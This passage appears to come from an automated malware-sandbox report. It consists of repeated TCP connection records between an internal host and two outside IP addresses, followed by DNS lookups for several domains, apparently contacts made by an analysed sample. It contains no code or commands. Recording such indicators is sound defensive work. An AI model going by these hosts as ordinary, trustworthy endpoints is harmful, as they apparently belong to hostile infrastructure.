      Source: global trafficTCP traffic: 103.242.124.88:443 -> 192.168.2.22:49187
      Source: global trafficTCP traffic: 103.242.124.88:443 -> 192.168.2.22:49187
      Source: global trafficTCP traffic: 192.168.2.22:49187 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49187 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 103.242.124.88:443 -> 192.168.2.22:49187
      Source: global trafficTCP traffic: 192.168.2.22:49187 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 103.242.124.88:443 -> 192.168.2.22:49187
      Source: global trafficTCP traffic: 103.242.124.88:443 -> 192.168.2.22:49187
      Source: global trafficTCP traffic: 192.168.2.22:49187 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 103.242.124.88:443 -> 192.168.2.22:49187
      Source: global trafficTCP traffic: 103.242.124.88:443 -> 192.168.2.22:49187
      Source: global trafficTCP traffic: 192.168.2.22:49187 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49187 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49187 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 103.242.124.88:443 -> 192.168.2.22:49187
      Source: global trafficTCP traffic: 192.168.2.22:49187 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49187 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49188 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49188
      Source: global trafficTCP traffic: 192.168.2.22:49188 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 192.168.2.22:49188 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49188
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49188
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49188
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49188
      Source: global trafficTCP traffic: 192.168.2.22:49188 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 192.168.2.22:49188 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49188
      Source: global trafficTCP traffic: 192.168.2.22:49188 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 192.168.2.22:49188 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49188
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49188
      Source: global trafficTCP traffic: 192.168.2.22:49188 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49188
      Source: global trafficTCP traffic: 192.168.2.22:49188 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49188
      Source: global trafficTCP traffic: 192.168.2.22:49188 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49188
      Source: global trafficTCP traffic: 192.168.2.22:49188 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 192.168.2.22:49188 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 192.168.2.22:49188 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49188
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49188
      Source: global trafficTCP traffic: 192.168.2.22:49188 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49188
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49188
      Source: global trafficTCP traffic: 192.168.2.22:49188 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 192.168.2.22:49188 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49188
      Source: global trafficTCP traffic: 192.168.2.22:49188 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49188
      Source: global trafficTCP traffic: 192.168.2.22:49188 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49188
      Source: global trafficTCP traffic: 192.168.2.22:49188 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49188
      Source: global trafficTCP traffic: 192.168.2.22:49188 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49188
      Source: global trafficTCP traffic: 192.168.2.22:49188 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 192.168.2.22:49188 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 192.168.2.22:49189 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 103.242.124.88:443 -> 192.168.2.22:49189
      Source: global trafficTCP traffic: 192.168.2.22:49189 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49189 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 103.242.124.88:443 -> 192.168.2.22:49189
      Source: global trafficTCP traffic: 103.242.124.88:443 -> 192.168.2.22:49189
      Source: global trafficTCP traffic: 192.168.2.22:49189 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49189 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 103.242.124.88:443 -> 192.168.2.22:49189
      Source: global trafficTCP traffic: 192.168.2.22:49189 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 103.242.124.88:443 -> 192.168.2.22:49189
      Source: global trafficTCP traffic: 103.242.124.88:443 -> 192.168.2.22:49189
      Source: global trafficTCP traffic: 192.168.2.22:49189 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 103.242.124.88:443 -> 192.168.2.22:49189
      Source: global trafficTCP traffic: 103.242.124.88:443 -> 192.168.2.22:49189
      Source: global trafficTCP traffic: 192.168.2.22:49189 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49189 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49189 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 103.242.124.88:443 -> 192.168.2.22:49189
      Source: global trafficTCP traffic: 192.168.2.22:49189 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49189 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49188 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49188
      Source: global trafficTCP traffic: 192.168.2.22:49188 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 15.223.2.12:80 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 15.223.2.12:80
      Source: global trafficDNS query: name: unesa.me
      Source: global trafficDNS query: name: unesa.me
      Source: global trafficDNS query: name: unesa.me
      Source: global trafficDNS query: name: unesa.me
      Source: global trafficDNS query: name: unesa.me
      Source: global trafficDNS query: name: unesa.me
      Source: global trafficDNS query: name: unesa.me
      Source: global trafficDNS query: name: www.folado.com
      Source: global trafficDNS query: name: www.cell-phones-0406-da-sa-fb.xyz
      Source: global trafficDNS query: name: www.dyj97.com
      Source: global trafficDNS query: name: www.dyj97.com
      Source: global trafficDNS query: name: www.dyj97.com
      Source: global trafficDNS query: name: www.dyj97.com
      Source: global trafficDNS query: name: www.dyj97.com
      Source: global trafficDNS query: name: www.dyj97.com
      Source: global trafficDNS query: name: www.dyj97.com
      Source: global trafficDNS query: name: www.dyj97.com
      Source: global trafficDNS query: name: www.dyj97.com
      Source: global trafficDNS query: name: www.dyj97.com
      Source: global trafficDNS query: name: www.dyj97.com
      Source: global trafficDNS query: name: www.dyj97.com
      Source: global trafficDNS query: name: www.orbit4dads.com
      Source: global trafficTCP traffic: 192.168.2.22:49187 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 103.242.124.88:443
